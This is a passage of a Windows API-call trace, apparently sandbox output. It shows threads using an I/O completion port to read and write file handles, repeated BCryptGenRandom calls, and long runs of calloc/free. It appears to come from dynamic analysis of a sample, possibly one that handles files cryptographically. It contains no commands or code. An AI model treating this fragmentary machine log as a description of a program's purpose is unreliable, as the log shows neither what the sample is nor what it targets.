lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x617, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0209.957] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0209.958] WriteFile (in: hFile=0x238, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x700, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0209.958] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0209.970] ReadFile (in: hFile=0x238, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x185, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0209.970] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0209.970] CloseHandle (hObject=0x238) returned 1 [0209.970] free (_Block=0x3df0008) [0209.970] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0209.978] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0209.979] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0209.979] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 0x0 [0209.979] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0209.979] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0209.979] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0209.979] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0209.980] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0209.980] free (_Block=0x3e305b8) [0209.980] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0209.980] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0209.980] free (_Block=0x1fa91d0) [0209.980] free (_Block=0x1fa2ed8) [0209.980] free (_Block=0x1fa90b8) [0209.980] WriteFile (in: hFile=0x238, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0209.981] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0209.981] WriteFile (in: hFile=0x238, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x1d0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0209.981] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0210.015] ReadFile (in: hFile=0x238, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x1f91, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0210.028] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0210.053] WriteFile (in: hFile=0xec, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x890, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0210.053] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0210.080] WriteFile (in: hFile=0x170, lpBuffer=0x3d70484, nNumberOfBytesToWrite=0xaf0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 0x0 [0210.081] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0210.107] WriteFile (in: hFile=0x3cc, lpBuffer=0x3e7003c, nNumberOfBytesToWrite=0x350, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 0x0 [0210.108] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0210.116] CloseHandle (hObject=0x2a8) returned 1 [0210.116] free (_Block=0x3ef0008) [0210.116] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0210.117] CloseHandle (hObject=0x338) returned 1 [0210.117] free (_Block=0x3f70048) [0210.117] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0210.117] CloseHandle (hObject=0x308) returned 1 [0210.117] free (_Block=0x3fb00b8) [0210.118] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0210.153] ReadFile (in: hFile=0x238, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x3de, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0210.153] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0210.170] ReadFile (in: hFile=0xec, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x770, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0210.170] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0210.184] WriteFile (in: hFile=0x308, lpBuffer=0x3d70484, nNumberOfBytesToWrite=0x120, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 0x0 [0210.185] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0210.190] WriteFile (in: hFile=0x338, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0x2e0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0210.190] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0210.192] WriteFile (in: hFile=0x2a8, lpBuffer=0x3ef003c*, nNumberOfBytesToWrite=0x350, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008) returned 1 [0210.192] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0210.194] CloseHandle (hObject=0x238) returned 1 [0210.195] free (_Block=0x1ff1e60) [0210.195] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0210.231] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0210.231] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0210.231] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 0x0 [0210.231] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0210.232] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0210.232] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0210.232] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0210.232] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0210.232] free (_Block=0x3e305b8) [0210.232] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0210.233] calloc (_Count=0x82, _Size=0x4) returned 0x77d7a8 [0210.233] free (_Block=0x1fa91d0) [0210.233] free (_Block=0x77d7a8) [0210.233] free (_Block=0x1fa90b8) [0210.233] WriteFile (in: hFile=0x2a8, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x616, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0210.234] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0210.240] ReadFile (in: hFile=0x338, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x11a, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0210.240] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0210.264] CloseHandle (hObject=0x238) returned 1 [0210.264] free (_Block=0x3df0008) [0210.264] GetQueuedCompletionStatus (CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff) Thread: id = 17 os_tid = 0x914 [0069.072] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0076.657] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0076.658] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0076.658] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0076.658] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0076.658] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0076.658] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef92c, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef92c) returned 0x0 [0076.661] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0076.662] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0076.662] free (_Block=0x77d800) [0076.662] calloc (_Count=0x41, _Size=0x4) returned 0x1ff1930 [0076.662] calloc (_Count=0x82, _Size=0x4) returned 0x1ff1a40 [0076.662] calloc (_Count=0x1, _Size=0x4) returned 0x1fa03a8 [0076.662] calloc (_Count=0x81, _Size=0x4) returned 0x1ff1c50 [0076.662] free (_Block=0x1fa03a8) [0076.662] calloc (_Count=0x81, _Size=0x4) returned 0x1ff1e60 [0076.662] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0076.662] calloc (_Count=0x83, _Size=0x4) returned 0x1ff2070 [0076.662] calloc (_Count=0x2, _Size=0x4) returned 0x1fa03a8 [0076.662] calloc (_Count=0x3, _Size=0x4) returned 0x1fa2b08 [0076.662] calloc (_Count=0x41, _Size=0x4) returned 0x1ff2288 [0076.662] free (_Block=0x77d800) [0076.662] calloc (_Count=0x81, _Size=0x4) returned 0x1ff2398 [0076.662] free (_Block=0x1ff2288) [0076.662] calloc (_Count=0x2, _Size=0x4) returned 0x1fa03f8 [0076.662] calloc (_Count=0x3, _Size=0x4) returned 0x1fa2b20 [0076.662] free (_Block=0x1fa03a8) [0076.662] free (_Block=0x1fa03f8) [0076.662] calloc (_Count=0x42, _Size=0x4) returned 0x1ff2288 [0076.662] free (_Block=0x1fa2b20) [0076.662] calloc (_Count=0x81, _Size=0x4) returned 0x1ff25a8 [0076.662] free (_Block=0x1ff2288) [0076.662] calloc (_Count=0x2, _Size=0x4) returned 0x1fa03f8 [0076.662] free (_Block=0x1fa03f8) [0076.662] calloc (_Count=0x2, _Size=0x4) returned 0x1fa03f8 [0076.663] free (_Block=0x1fa03f8) [0076.663] calloc (_Count=0x2, _Size=0x4) returned 0x1fa03f8 [0076.663] free (_Block=0x1fa03f8) [0076.663] calloc (_Count=0x2, _Size=0x4) returned 0x1fa03f8 [0076.663] free (_Block=0x1fa03f8) [0076.663] calloc (_Count=0x2, _Size=0x4) returned 0x1fa03f8 [0076.663] free (_Block=0x1fa03f8) [0076.663] calloc (_Count=0x2, _Size=0x4) returned 0x1fa03f8 [0076.663] free (_Block=0x1fa03f8) [0076.663] calloc (_Count=0x2, _Size=0x4) returned 0x1fa03f8 [0076.663] free (_Block=0x1fa03f8) [0076.663] calloc (_Count=0x2, _Size=0x4) returned 0x1fa03f8 [0076.663] free (_Block=0x1fa03f8) [0076.663] calloc (_Count=0x2, _Size=0x4) returned 0x1fa03f8 [0076.663] free (_Block=0x1fa03f8) [0076.663] calloc (_Count=0x2, _Size=0x4) returned 0x1fa03f8 [0076.663] free (_Block=0x1fa03f8) [0076.663] calloc (_Count=0x2, _Size=0x4) returned 0x1fa03f8 [0076.663] free (_Block=0x1fa03f8) [0076.663] calloc (_Count=0x2, _Size=0x4) returned 0x1fa03f8 [0076.663] free (_Block=0x1fa03f8) [0076.663] calloc (_Count=0x2, _Size=0x4) returned 0x1fa03f8 [0076.663] free (_Block=0x1fa03f8) [0076.663] calloc (_Count=0x2, _Size=0x4) returned 0x1fa03f8 [0076.663] free (_Block=0x1fa03f8) [0076.663] calloc (_Count=0x2, _Size=0x4) returned 0x1fa03f8 [0076.663] free (_Block=0x1fa03f8) [0076.663] calloc (_Count=0x2, _Size=0x4) returned 0x1fa03f8 [0076.663] free (_Block=0x1fa03f8) [0076.664] calloc (_Count=0x2, _Size=0x4) returned 0x1fa03f8 [0076.664] free (_Block=0x1fa03f8) [0076.664] calloc (_Count=0x2, _Size=0x4) returned 0x1fa03f8 [0076.664] free (_Block=0x1fa03f8) [0076.664] calloc (_Count=0x2, _Size=0x4) returned 0x1fa03f8 [0076.664] free (_Block=0x1fa03f8) [0076.664] calloc (_Count=0x2, _Size=0x4) returned 0x1fa03f8 [0076.664] free (_Block=0x1fa03f8) [0076.664] calloc (_Count=0x2, _Size=0x4) returned 0x1fa03f8 [0076.664] free (_Block=0x1fa03f8) [0076.664] calloc (_Count=0x2, _Size=0x4) returned 0x1fa03f8 [0076.664] free (_Block=0x1fa03f8) [0076.664] calloc (_Count=0x2, _Size=0x4) returned 0x1fa03f8 [0076.664] free (_Block=0x1fa03f8) [0076.664] calloc (_Count=0x2, _Size=0x4) returned 0x1fa03f8 [0076.664] free (_Block=0x1fa03f8) [0076.664] calloc (_Count=0x2, _Size=0x4) returned 0x1fa03f8 [0076.664] free (_Block=0x1fa03f8) [0076.664] calloc (_Count=0x2, _Size=0x4) returned 0x1fa03f8 [0076.664] free (_Block=0x1fa03f8) [0076.664] calloc (_Count=0x2, _Size=0x4) returned 0x1fa03f8 [0076.664] free (_Block=0x1fa03f8) [0076.664] calloc (_Count=0x2, _Size=0x4) returned 0x1fa03f8 [0076.664] free (_Block=0x1fa03f8) [0076.665] calloc (_Count=0x2, _Size=0x4) returned 0x1fa03f8 [0076.665] free (_Block=0x1fa03f8) [0076.665] calloc (_Count=0x2, _Size=0x4) returned 0x1fa03f8 [0076.665] free (_Block=0x1fa03f8) [0076.665] calloc (_Count=0x2, _Size=0x4) returned 0x1fa03f8 [0076.665] free (_Block=0x1fa03f8) [0076.665] calloc (_Count=0x2, _Size=0x4) returned 0x1fa03f8 [0076.665] free (_Block=0x1fa03f8) [0076.665] calloc (_Count=0x2, _Size=0x4) returned 0x1fa03f8 [0076.665] free (_Block=0x1fa03f8) [0076.665] calloc (_Count=0x2, _Size=0x4) returned 0x1fa03f8 [0076.665] free (_Block=0x1fa03f8) [0076.665] calloc (_Count=0x2, _Size=0x4) returned 0x1fa03f8 [0076.665] free (_Block=0x1fa03f8) [0076.665] calloc (_Count=0x2, _Size=0x4) returned 0x1fa03f8 [0076.665] free (_Block=0x1fa03f8) [0076.665] calloc (_Count=0x2, _Size=0x4) returned 0x1fa03f8 [0076.665] free (_Block=0x1fa03f8) [0076.665] calloc (_Count=0x2, _Size=0x4) returned 0x1fa03f8 [0076.665] free (_Block=0x1fa03f8) [0076.665] calloc (_Count=0x2, _Size=0x4) returned 0x1fa03f8 [0076.665] free (_Block=0x1fa03f8) [0076.665] calloc (_Count=0x2, _Size=0x4) returned 0x1fa03f8 [0076.665] free (_Block=0x1fa03f8) [0076.665] calloc (_Count=0x2, _Size=0x4) returned 0x1fa03f8 [0076.665] free (_Block=0x1fa03f8) [0076.665] calloc (_Count=0x2, _Size=0x4) returned 0x1fa03f8 [0076.666] free (_Block=0x1fa03f8) [0076.666] calloc (_Count=0x2, _Size=0x4) returned 0x1fa03f8 [0076.666] free (_Block=0x1fa03f8) [0076.666] calloc (_Count=0x2, _Size=0x4) returned 0x1fa03f8 [0076.666] free (_Block=0x1fa03f8) [0076.666] calloc (_Count=0x2, _Size=0x4) returned 0x1fa03f8 [0076.666] free (_Block=0x1fa03f8) [0076.666] calloc (_Count=0x2, _Size=0x4) returned 0x1fa03f8 [0076.666] free (_Block=0x1fa03f8) [0076.666] calloc (_Count=0x2, _Size=0x4) returned 0x1fa03f8 [0076.666] free (_Block=0x1fa03f8) [0076.666] calloc (_Count=0x2, _Size=0x4) returned 0x1fa03f8 [0076.666] free (_Block=0x1fa03f8) [0076.666] calloc (_Count=0x2, _Size=0x4) returned 0x1fa03f8 [0076.666] free (_Block=0x1fa03f8) [0076.666] calloc (_Count=0x2, _Size=0x4) returned 0x1fa03f8 [0076.666] free (_Block=0x1fa03f8) [0076.666] calloc (_Count=0x2, _Size=0x4) returned 0x1fa03f8 [0076.666] free (_Block=0x1fa03f8) [0076.666] calloc (_Count=0x2, _Size=0x4) returned 0x1fa03f8 [0076.666] free (_Block=0x1fa03f8) [0076.666] calloc (_Count=0x2, _Size=0x4) returned 0x1fa03f8 [0076.666] free (_Block=0x1fa03f8) [0076.666] calloc (_Count=0x2, _Size=0x4) returned 0x1fa03f8 [0076.666] free (_Block=0x1fa03f8) [0076.666] calloc (_Count=0x2, _Size=0x4) returned 0x1fa03f8 [0076.666] free (_Block=0x1fa03f8) [0076.666] calloc (_Count=0x2, _Size=0x4) returned 0x1fa03f8 [0076.666] free (_Block=0x1fa03f8) [0076.667] calloc (_Count=0x2, _Size=0x4) returned 0x1fa03f8 [0076.667] free (_Block=0x1fa03f8) [0076.667] calloc (_Count=0x2, _Size=0x4) returned 0x1fa03f8 [0076.667] free (_Block=0x1fa03f8) [0076.667] calloc (_Count=0x2, _Size=0x4) returned 0x1fa03f8 [0076.667] free (_Block=0x1fa03f8) [0076.667] calloc (_Count=0x2, _Size=0x4) returned 0x1fa03f8 [0076.667] free (_Block=0x1fa03f8) [0076.667] calloc (_Count=0x2, _Size=0x4) returned 0x1fa03f8 [0076.667] free (_Block=0x1fa03f8) [0076.667] calloc (_Count=0x2, _Size=0x4) returned 0x1fa03f8 [0076.667] free (_Block=0x1fa03f8) [0076.667] calloc (_Count=0x2, _Size=0x4) returned 0x1fa03f8 [0076.667] free (_Block=0x1fa03f8) [0076.667] calloc (_Count=0x2, _Size=0x4) returned 0x1fa03f8 [0076.667] free (_Block=0x1fa03f8) [0076.667] calloc (_Count=0x2, _Size=0x4) returned 0x1fa03f8 [0076.667] free (_Block=0x1fa03f8) [0076.667] calloc (_Count=0x2, _Size=0x4) returned 0x1fa03f8 [0076.667] free (_Block=0x1fa03f8) [0076.667] calloc (_Count=0x2, _Size=0x4) returned 0x1fa03f8 [0076.667] free (_Block=0x1fa03f8) [0076.667] calloc (_Count=0x2, _Size=0x4) returned 0x1fa03f8 [0076.667] free (_Block=0x1fa03f8) [0076.667] calloc (_Count=0x2, _Size=0x4) returned 0x1fa03f8 [0076.667] free (_Block=0x1fa03f8) [0076.667] calloc (_Count=0x2, _Size=0x4) returned 0x1fa03f8 [0076.667] free (_Block=0x1fa03f8) [0076.667] calloc (_Count=0x2, _Size=0x4) returned 0x1fa03f8 [0076.668] free (_Block=0x1fa03f8) [0076.668] calloc (_Count=0x2, _Size=0x4) returned 0x1fa03f8 [0076.668] free (_Block=0x1fa03f8) [0076.668] calloc (_Count=0x2, _Size=0x4) returned 0x1fa03f8 [0076.668] free (_Block=0x1fa03f8) [0076.668] calloc (_Count=0x2, _Size=0x4) returned 0x1fa03f8 [0076.668] free (_Block=0x1fa03f8) [0076.668] calloc (_Count=0x2, _Size=0x4) returned 0x1fa03f8 [0076.668] free (_Block=0x1fa03f8) [0076.668] calloc (_Count=0x2, _Size=0x4) returned 0x1fa03f8 [0076.668] free (_Block=0x1fa03f8) [0076.668] calloc (_Count=0x2, _Size=0x4) returned 0x1fa03f8 [0076.668] free (_Block=0x1fa03f8) [0076.668] calloc (_Count=0x2, _Size=0x4) returned 0x1fa03f8 [0076.668] free (_Block=0x1fa03f8) [0076.668] calloc (_Count=0x2, _Size=0x4) returned 0x1fa03f8 [0076.668] free (_Block=0x1fa03f8) [0076.668] calloc (_Count=0x2, _Size=0x4) returned 0x1fa03f8 [0076.668] free (_Block=0x1fa03f8) [0076.668] calloc (_Count=0x2, _Size=0x4) returned 0x1fa03f8 [0076.668] free (_Block=0x1fa03f8) [0076.668] calloc (_Count=0x2, _Size=0x4) returned 0x1fa03f8 [0076.668] free (_Block=0x1fa03f8) [0076.668] calloc (_Count=0x2, _Size=0x4) returned 0x1fa03f8 [0076.668] free (_Block=0x1fa03f8) [0076.668] calloc (_Count=0x2, _Size=0x4) returned 0x1fa03f8 [0076.668] free (_Block=0x1fa03f8) [0076.668] calloc (_Count=0x2, _Size=0x4) returned 0x1fa03f8 [0076.669] free (_Block=0x1fa03f8) [0076.669] calloc (_Count=0x2, _Size=0x4) returned 0x1fa03f8 [0076.669] free (_Block=0x1fa03f8) [0076.669] calloc (_Count=0x2, _Size=0x4) returned 0x1fa03f8 [0076.669] free (_Block=0x1fa03f8) [0076.669] calloc (_Count=0x2, _Size=0x4) returned 0x1fa03f8 [0076.669] free (_Block=0x1fa03f8) [0076.669] calloc (_Count=0x2, _Size=0x4) returned 0x1fa03f8 [0076.669] free (_Block=0x1fa03f8) [0076.669] calloc (_Count=0x2, _Size=0x4) returned 0x1fa03f8 [0076.669] free (_Block=0x1fa03f8) [0076.669] calloc (_Count=0x2, _Size=0x4) returned 0x1fa03f8 [0076.669] free (_Block=0x1fa03f8) [0076.669] calloc (_Count=0x2, _Size=0x4) returned 0x1fa03f8 [0076.669] free (_Block=0x1fa03f8) [0076.669] calloc (_Count=0x2, _Size=0x4) returned 0x1fa03f8 [0076.669] free (_Block=0x1fa03f8) [0076.669] calloc (_Count=0x2, _Size=0x4) returned 0x1fa03f8 [0076.669] free (_Block=0x1fa03f8) [0076.669] calloc (_Count=0x2, _Size=0x4) returned 0x1fa03f8 [0076.669] free (_Block=0x1fa03f8) [0076.669] calloc (_Count=0x2, _Size=0x4) returned 0x1fa03f8 [0076.669] free (_Block=0x1fa03f8) [0076.669] calloc (_Count=0x2, _Size=0x4) returned 0x1fa03f8 [0076.669] free (_Block=0x1fa03f8) [0076.669] calloc (_Count=0x2, _Size=0x4) returned 0x1fa03f8 [0076.669] free (_Block=0x1fa03f8) [0076.669] calloc (_Count=0x2, _Size=0x4) returned 0x1fa03f8 [0076.670] free (_Block=0x1fa03f8) [0076.670] calloc (_Count=0x2, _Size=0x4) returned 0x1fa03f8 [0076.670] free (_Block=0x1fa03f8) [0076.670] calloc (_Count=0x2, _Size=0x4) returned 0x1fa03f8 [0076.670] free (_Block=0x1fa03f8) [0076.670] calloc (_Count=0x2, _Size=0x4) returned 0x1fa03f8 [0076.670] free (_Block=0x1fa03f8) [0076.670] calloc (_Count=0x2, _Size=0x4) returned 0x1fa03f8 [0076.670] free (_Block=0x1fa03f8) [0076.670] calloc (_Count=0x2, _Size=0x4) returned 0x1fa03f8 [0076.670] free (_Block=0x1fa03f8) [0076.670] calloc (_Count=0x2, _Size=0x4) returned 0x1fa03f8 [0076.670] free (_Block=0x1fa03f8) [0076.670] calloc (_Count=0x2, _Size=0x4) returned 0x1fa03f8 [0076.670] free (_Block=0x1fa03f8) 